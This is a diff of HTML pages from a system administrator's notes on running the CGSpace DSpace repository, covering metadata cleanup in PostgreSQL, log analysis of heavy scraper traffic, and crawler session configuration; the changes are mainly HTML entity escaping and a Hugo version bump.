FILTER regex(str(?label), &quot;^fish&quot;, &quot;i&quot;) .
FILTER regex(str(?label), &#34;^fish&#34;, &#34;i&#34;) .
} LIMIT 10;
┌───────────────────────┐
@ -452,7 +452,7 @@ WHERE {
<li>Since I cleared the XMLUI cache on 2017-08-17 there haven&rsquo;t been any more <code>ERROR net.sf.ehcache.store.DiskStore</code> errors</li>
<li>Look at the CGIAR Library to see if I can find the items that have been submitted since May:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where metadata_field_id=11 and date(text_value) &gt; '2017-05-01T00:00:00Z';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where metadata_field_id=11 and date(text_value) &gt; &#39;2017-05-01T00:00:00Z&#39;;
metadata_value_id | item_id | metadata_field_id | text_value | text_lang | place | authority | confidence
-------------------+---------+-------------------+----------------------+-----------+-------+-----------+------------
123117 | 5872 | 11 | 2017-06-28T13:05:18Z | | 1 | | -1
@ -465,7 +465,7 @@ WHERE {
<li>According to <code>dc.date.accessioned</code> (metadata field id 11) there have only been five items submitted since May</li>
<li>These are their handles:</li>
</ul>
<pre tabindex="0"><code>dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) &gt; '2017-05-01T00:00:00Z');
<pre tabindex="0"><code>dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) &gt; &#39;2017-05-01T00:00:00Z&#39;);
handle
------------
10947/4658


@ -32,7 +32,7 @@ Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two
Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account is both in the approvers step as well as the group
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -130,7 +130,7 @@ Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account
<ul>
<li>Delete 58 blank metadata values from the CGSpace database:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 58
</code></pre><ul>
<li>I also ran it on DSpace Test because we&rsquo;ll be migrating the CGIAR Library soon and it would be good to catch these before we migrate</li>
@ -145,7 +145,7 @@ DELETE 58
<li>There will need to be some metadata updates (though if I recall correctly it is only about seven records) for that as well; I had made some notes about it in <a href="/cgspace-notes/2017-07">2017-07</a>, but I&rsquo;ve asked for more clarification from Lili just in case</li>
<li>Looking at the DSpace logs to see if we&rsquo;ve had a change in the &ldquo;Cannot get a connection&rdquo; errors since last month when we adjusted the <code>db.maxconnections</code> parameter on CGSpace:</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;Cannot get a connection, pool error Timeout waiting for idle object&quot; dspace.log.2017-09-*
<pre tabindex="0"><code># grep -c &#34;Cannot get a connection, pool error Timeout waiting for idle object&#34; dspace.log.2017-09-*
dspace.log.2017-09-01:0
dspace.log.2017-09-02:0
dspace.log.2017-09-03:9
@ -174,7 +174,7 @@ dspace.log.2017-09-10:0
<li>The import process takes the same amount of time with and without the caching</li>
<li>Also, I captured TCP packets destined for port 80, and both imports generated only ONE packet (an update check from some component in Java):</li>
</ul>
<pre tabindex="0"><code>$ sudo tcpdump -i en0 -w without-cached-xsd.dump dst port 80 and 'tcp[32:4] = 0x47455420'
<pre tabindex="0"><code>$ sudo tcpdump -i en0 -w without-cached-xsd.dump dst port 80 and &#39;tcp[32:4] = 0x47455420&#39;
</code></pre><ul>
<li>Great TCP dump guide here: <a href="https://danielmiessler.com/study/tcpdump">https://danielmiessler.com/study/tcpdump</a></li>
<li>The last part of that command filters for HTTP GET requests, of which there should have been many to fetch all the XSD files for validation</li>
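<li>For reference, <code>0x47455420</code> is just the ASCII encoding of <code>GET </code> (including the trailing space), which is easy to verify:</li>
</ul>
<pre tabindex="0"><code>$ printf &#39;GET &#39; | xxd
00000000: 4745 5420                                GET 
</code></pre><ul>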
@ -204,7 +204,7 @@ dspace.log.2017-09-10:0
<li>I wonder what was going on, and looking into the nginx logs I think maybe it&rsquo;s OAI&hellip;</li>
<li>Here is yesterday&rsquo;s top ten IP addresses making requests to <code>/oai</code>:</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/oai.log | sort -n | uniq -c | sort -h | tail -n 10
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/oai.log | sort -n | uniq -c | sort -h | tail -n 10
1 213.136.89.78
1 66.249.66.90
1 66.249.66.92
@ -217,7 +217,7 @@ dspace.log.2017-09-10:0
</code></pre><ul>
<li>Compared to the previous day&rsquo;s logs it looks VERY high:</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
1 207.46.13.39
1 66.249.66.93
2 66.249.66.91
@ -234,9 +234,9 @@ dspace.log.2017-09-10:0
</li>
<li>And this user agent has never been seen before today (or at least recently!):</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;API scraper&quot; /var/log/nginx/oai.log
<pre tabindex="0"><code># grep -c &#34;API scraper&#34; /var/log/nginx/oai.log
62088
# zgrep -c &quot;API scraper&quot; /var/log/nginx/oai.log.*.gz
# zgrep -c &#34;API scraper&#34; /var/log/nginx/oai.log.*.gz
/var/log/nginx/oai.log.10.gz:0
/var/log/nginx/oai.log.11.gz:0
/var/log/nginx/oai.log.12.gz:0
@ -270,7 +270,7 @@ dspace.log.2017-09-10:0
<li>Some of these heavy users are also using XMLUI, and their user agent isn&rsquo;t matched by the <a href="https://github.com/ilri/rmg-ansible-public/blob/master/roles/dspace/templates/tomcat/server-tomcat7.xml.j2#L158">Tomcat Session Crawler valve</a>, so each request uses a different session</li>
<li>Yesterday alone the IP addresses using the <code>API scraper</code> user agent were responsible for 16,000 sessions in XMLUI:</li>
</ul>
<pre tabindex="0"><code># grep -a -E &quot;(54.70.51.7|35.161.215.53|34.211.17.113|54.70.175.86)&quot; /home/cgspace.cgiar.org/log/dspace.log.2017-09-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep -a -E &#34;(54.70.51.7|35.161.215.53|34.211.17.113|54.70.175.86)&#34; /home/cgspace.cgiar.org/log/dspace.log.2017-09-12 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
15924
</code></pre><ul>
<li>If this continues I will definitely need to figure out who is responsible for this scraper and add their user agent to the session crawler valve regex</li>
@ -282,7 +282,7 @@ dspace.log.2017-09-10:0
<li>Looking at the spreadsheet with deletions and corrections that CCAFS sent last week</li>
<li>It appears they want to delete a lot of metadata, which I&rsquo;m not sure they realize the implications of:</li>
</ul>
<pre tabindex="0"><code>dspace=# select text_value, count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange') group by text_value;
<pre tabindex="0"><code>dspace=# select text_value, count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in (&#39;EA_PAR&#39;,&#39;FP1_CSAEvidence&#39;,&#39;FP2_CRMWestAfrica&#39;,&#39;FP3_Gender&#39;,&#39;FP4_Baseline&#39;,&#39;FP4_CCPAG&#39;,&#39;FP4_CCPG&#39;,&#39;FP4_CIATLAM IMPACT&#39;,&#39;FP4_ClimateData&#39;,&#39;FP4_ClimateModels&#39;,&#39;FP4_GenderPolicy&#39;,&#39;FP4_GenderToolbox&#39;,&#39;FP4_Livestock&#39;,&#39;FP4_PolicyEngagement&#39;,&#39;FP_GII&#39;,&#39;SA_Biodiversity&#39;,&#39;SA_CSV&#39;,&#39;SA_GHGMeasurement&#39;,&#39;SEA_mitigationSAMPLES&#39;,&#39;SEA_UpscalingInnovation&#39;,&#39;WA_Partnership&#39;,&#39;WA_SciencePolicyExchange&#39;) group by text_value;
text_value | count
--------------------------+-------
FP4_ClimateModels | 6
@ -309,18 +309,18 @@ dspace.log.2017-09-10:0
<li>I sent CCAFS people an email to ask if they really want to remove these 200+ tags</li>
<li>She responded yes, so I&rsquo;ll at least need to do these deletes in PostgreSQL:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in (&#39;EA_PAR&#39;,&#39;FP1_CSAEvidence&#39;,&#39;FP2_CRMWestAfrica&#39;,&#39;FP3_Gender&#39;,&#39;FP4_Baseline&#39;,&#39;FP4_CCPAG&#39;,&#39;FP4_CCPG&#39;,&#39;FP4_CIATLAM IMPACT&#39;,&#39;FP4_ClimateData&#39;,&#39;FP4_ClimateModels&#39;,&#39;FP4_GenderPolicy&#39;,&#39;FP4_GenderToolbox&#39;,&#39;FP4_Livestock&#39;,&#39;FP4_PolicyEngagement&#39;,&#39;FP_GII&#39;,&#39;SA_Biodiversity&#39;,&#39;SA_CSV&#39;,&#39;SA_GHGMeasurement&#39;,&#39;SEA_mitigationSAMPLES&#39;,&#39;SEA_UpscalingInnovation&#39;,&#39;WA_Partnership&#39;,&#39;WA_SciencePolicyExchange&#39;,&#39;FP_GII&#39;);
DELETE 207
</code></pre><ul>
<li>When we discussed this in late July there were some other renames they had requested, but I don&rsquo;t see them in the current spreadsheet so I will have to follow that up</li>
<li>I talked to Macaroni Bros and they said to just go ahead with the other corrections as well, as their spreadsheet had evolved organically rather than systematically!</li>
<li>The final list of corrections and deletes should therefore be:</li>
</ul>
<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-FP4_CRMWestAfrica&#39;;
update metadatavalue set text_value=&#39;FP3_VietnamLED&#39; where resource_type_id=2 and metadata_field_id=134 and text_value=&#39;FP3_VeitnamLED&#39;;
update metadatavalue set text_value=&#39;PII-FP1_PIRCCA&#39; where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-SEA_PIRCCA&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-WA_IntegratedInterventions&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in (&#39;EA_PAR&#39;,&#39;FP1_CSAEvidence&#39;,&#39;FP2_CRMWestAfrica&#39;,&#39;FP3_Gender&#39;,&#39;FP4_Baseline&#39;,&#39;FP4_CCPAG&#39;,&#39;FP4_CCPG&#39;,&#39;FP4_CIATLAM IMPACT&#39;,&#39;FP4_ClimateData&#39;,&#39;FP4_ClimateModels&#39;,&#39;FP4_GenderPolicy&#39;,&#39;FP4_GenderToolbox&#39;,&#39;FP4_Livestock&#39;,&#39;FP4_PolicyEngagement&#39;,&#39;FP_GII&#39;,&#39;SA_Biodiversity&#39;,&#39;SA_CSV&#39;,&#39;SA_GHGMeasurement&#39;,&#39;SEA_mitigationSAMPLES&#39;,&#39;SEA_UpscalingInnovation&#39;,&#39;WA_Partnership&#39;,&#39;WA_SciencePolicyExchange&#39;,&#39;FP_GII&#39;);
</code></pre><ul>
<li>Create and merge pull request to shut up the Ehcache update check (<a href="https://github.com/ilri/DSpace/pull/337">#337</a>)</li>
<li>Although it looks like there was a previous attempt to disable these update checks that was merged in DSpace 4.0 (although it only affects XMLUI): <a href="https://jira.duraspace.org/browse/DS-1492">https://jira.duraspace.org/browse/DS-1492</a></li>
@ -332,7 +332,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
<li>Testing to see how we end up with all these new authorities after we keep cleaning and merging them in the database</li>
<li>Here are all my distinct authority combinations in the database before:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -347,7 +347,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>And then after adding a new item and selecting an existing &ldquo;Orth, Alan&rdquo; with an ORCID in the author lookup:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -363,7 +363,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>It created a new authority&hellip; let&rsquo;s try to add another item and select the same existing author and see what happens in the database:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -379,7 +379,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>No new one&hellip; so now let me try to add another item and select the italicized result from the ORCID lookup and see what happens in the database:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -396,7 +396,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>Shit, it created another authority! Let&rsquo;s try it again!</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -439,19 +439,19 @@ DELETE 207
<li>We still need to do the changes to <code>config.dct</code> and regenerate the <code>sitebndl.zip</code> to send to the Handle.net admins</li>
<li>According to this <a href="http://dspace.2283337.n4.nabble.com/Multiple-handle-prefixes-merged-DSpace-instances-td3427192.html">dspace-tech mailing list entry from 2011</a>, we need to add the extra handle prefixes to <code>config.dct</code> like this:</li>
</ul>
<pre tabindex="0"><code>&quot;server_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
<pre tabindex="0"><code>&#34;server_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
&quot;replication_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
&#34;replication_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
&quot;backup_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
&#34;backup_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
</code></pre><ul>
<li>More work on the CGIAR Library migration test run locally, as I was having a problem with importing the last fourteen items from the CGIAR System Management Office community</li>
@ -494,7 +494,7 @@ DELETE 207
<li>Abenet and I noticed that hdl.handle.net is blocked by ETC at ILRI Addis so I asked Biruk Debebe to route it over the satellite</li>
<li>Force thumbnail regeneration for the CGIAR System Organization&rsquo;s Historic Archive community (2000 items):</li>
</ul>
<pre tabindex="0"><code>$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -f -i 10947/1 -p &quot;ImageMagick PDF Thumbnail&quot;
<pre tabindex="0"><code>$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -f -i 10947/1 -p &#34;ImageMagick PDF Thumbnail&#34;
</code></pre><ul>
<li>I&rsquo;m still waiting (over 1 day later) to hear back from the CGIAR System Organization about updating the DNS for library.cgiar.org</li>
</ul>
@ -552,7 +552,7 @@ DELETE 207
<li>Communicate (finally) with Tania and Tunji from the CGIAR System Organization office to tell them to request CGNET make the DNS updates for library.cgiar.org</li>
<li>Peter wants me to clean up the text values for Delia Grace&rsquo;s metadata, as the authorities are all messed up again since we cleaned them up in <a href="/cgspace-notes/2016-12">2016-12</a>:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
text_value | authority | confidence
--------------+--------------------------------------+------------
Grace, Delia | | 600
@ -563,12 +563,12 @@ DELETE 207
<li>Strangely, none of her authority entries have ORCIDs anymore&hellip;</li>
<li>I&rsquo;ll just fix the text values and forget about it for now:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;bfa61d7c-7583-4175-991c-2e7315000f0c&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
UPDATE 610
</code></pre><ul>
<li>After this we have to reindex the Discovery and Authority cores (as <code>tomcat7</code> user):</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
real 83m56.895s
@ -34,7 +34,7 @@ http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
There appears to be a pattern but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine
Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -140,7 +140,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>I thought maybe his account had expired (seeing as it was the first of the month) but he says he was finally able to log in today</li>
<li>The logs for yesterday show fourteen errors related to LDAP auth failures:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;ldap_authentication:type=failed_auth&quot; dspace.log.2017-10-01
<pre tabindex="0"><code>$ grep -c &#34;ldap_authentication:type=failed_auth&#34; dspace.log.2017-10-01
14
</code></pre><ul>
<li>For what it&rsquo;s worth, there are no errors on any other recent days, so it must have been some network issue on Linode or CGNET&rsquo;s LDAP server</li>
@ -165,7 +165,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Twice in the past twenty-four hours Linode has warned that CGSpace&rsquo;s outbound traffic rate was exceeding the notification threshold</li>
<li>I had a look at yesterday&rsquo;s OAI and REST logs in <code>/var/log/nginx</code> but didn&rsquo;t see anything unusual:</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 10
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 10
141 157.55.39.240
145 40.77.167.85
162 66.249.66.92
@ -176,7 +176,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
1495 50.116.102.77
3904 70.32.83.92
9904 45.5.184.196
# awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
# awk &#39;{print $1}&#39; /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
5 66.249.66.71
6 66.249.66.67
6 68.180.229.31
@ -270,14 +270,14 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Annnd I reloaded the Atmire Usage Stats module and the connections shot back up and CGSpace went down again</li>
<li>Still not sure where the load is coming from right now, but it&rsquo;s clear why there were so many alerts yesterday on the 25th!</li>
</ul>
<pre tabindex="0"><code># grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-25 | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2017-10-25 | sort -n | uniq | wc -l
18022
</code></pre><ul>
<li>Compared to other days there were two or three times the number of requests yesterday!</li>
</ul>
<pre tabindex="0"><code># grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-23 | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2017-10-23 | sort -n | uniq | wc -l
3141
# grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-26 | sort -n | uniq | wc -l
# grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2017-10-26 | sort -n | uniq | wc -l
7851
</code></pre><ul>
<li>I still have no idea what was causing the load to go up today</li>
@ -302,7 +302,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>I&rsquo;m still not sure why this started causing alerts so repeatedly this past week</li>
<li>I don&rsquo;t see any tell tale signs in the REST or OAI logs, so trying to do rudimentary analysis in DSpace logs:</li>
</ul>
<pre tabindex="0"><code># grep '2017-10-29 02:' dspace.log.2017-10-29 | grep -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep &#39;2017-10-29 02:&#39; dspace.log.2017-10-29 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2049
</code></pre><ul>
<li>So there were 2049 unique sessions during the hour of 2AM</li>
@ -310,7 +310,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>I think I&rsquo;ll need to enable access logging in nginx to figure out what&rsquo;s going on</li>
<li>After enabling logging on requests to XMLUI on <code>/</code> I see some new bot I&rsquo;ve never seen before:</li>
</ul>
<pre tabindex="0"><code>137.108.70.6 - - [29/Oct/2017:07:39:49 +0000] &quot;GET /discover?filtertype_0=type&amp;filter_relational_operator_0=equals&amp;filter_0=Internal+Document&amp;filtertype=author&amp;filter_relational_operator=equals&amp;filter=CGIAR+Secretariat HTTP/1.1&quot; 200 7776 &quot;-&quot; &quot;Mozilla/5.0 (compatible; CORE/0.6; +http://core.ac.uk; http://core.ac.uk/intro/contact)&quot;
<pre tabindex="0"><code>137.108.70.6 - - [29/Oct/2017:07:39:49 +0000] &#34;GET /discover?filtertype_0=type&amp;filter_relational_operator_0=equals&amp;filter_0=Internal+Document&amp;filtertype=author&amp;filter_relational_operator=equals&amp;filter=CGIAR+Secretariat HTTP/1.1&#34; 200 7776 &#34;-&#34; &#34;Mozilla/5.0 (compatible; CORE/0.6; +http://core.ac.uk; http://core.ac.uk/intro/contact)&#34;
</code></pre><ul>
<li>CORE seems to be some bot that is &ldquo;Aggregating the world&rsquo;s open access research papers&rdquo;</li>
<li>The contact address listed in their bot&rsquo;s user agent is incorrect, correct page is simply: <a href="https://core.ac.uk/contact">https://core.ac.uk/contact</a></li>
@ -329,20 +329,20 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
</code></pre><ul>
<li>Surprise surprise, the CORE bot is likely responsible for the recent load issues, making hundreds of thousands of requests yesterday and today:</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;CORE/0.6&quot; /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c &#34;CORE/0.6&#34; /var/log/nginx/access.log
26475
# grep -c &quot;CORE/0.6&quot; /var/log/nginx/access.log.1
# grep -c &#34;CORE/0.6&#34; /var/log/nginx/access.log.1
135083
</code></pre><ul>
<li>IP addresses for this bot currently seem to be:</li>
</ul>
<pre tabindex="0"><code># grep &quot;CORE/0.6&quot; /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq
<pre tabindex="0"><code># grep &#34;CORE/0.6&#34; /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort -n | uniq
137.108.70.6
137.108.70.7
</code></pre><ul>
<li>I will add their user agent to the Tomcat Crawler Session Manager Valve but it won&rsquo;t help much because they are only using two sessions:</li>
</ul>
<pre tabindex="0"><code># grep 137.108.70 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq
<pre tabindex="0"><code># grep 137.108.70 dspace.log.2017-10-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq
session_id=5771742CABA3D0780860B8DA81E0551B
session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
</code></pre><ul>
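<li>For reference, that valve lives in Tomcat&rsquo;s <code>server.xml</code> and matches crawlers by user agent regex; the stock pattern looks something like this (a sketch of the default, not our exact config):</li>
</ul>
<pre tabindex="0"><code>&lt;Valve className=&#34;org.apache.catalina.valves.CrawlerSessionManagerValve&#34;
       crawlerUserAgents=&#34;.*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*&#34; /&gt;
</code></pre><ul>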
@ -350,12 +350,12 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
</ul>
<pre tabindex="0"><code># grep -c 137.108.70 /var/log/nginx/access.log
26622
# grep 137.108.70 /var/log/nginx/access.log | grep -c &quot;GET /discover&quot;
# grep 137.108.70 /var/log/nginx/access.log | grep -c &#34;GET /discover&#34;
24055
</code></pre><ul>
<li>Just because I&rsquo;m curious who the top IPs are:</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
496 62.210.247.93
571 46.4.94.226
651 40.77.167.39
@ -371,9 +371,9 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>190.19.92.5 is apparently in Argentina, and 104.196.152.243 is from Google Cloud Engine</li>
<li>Actually, these two scrapers might be more responsible for the heavy load than the CORE bot, because they don&rsquo;t reuse their session variable, creating thousands of new sessions!</li>
</ul>
<pre tabindex="0"><code># grep 190.19.92.5 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep 190.19.92.5 dspace.log.2017-10-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1419
# grep 104.196.152.243 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
# grep 104.196.152.243 dspace.log.2017-10-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2811
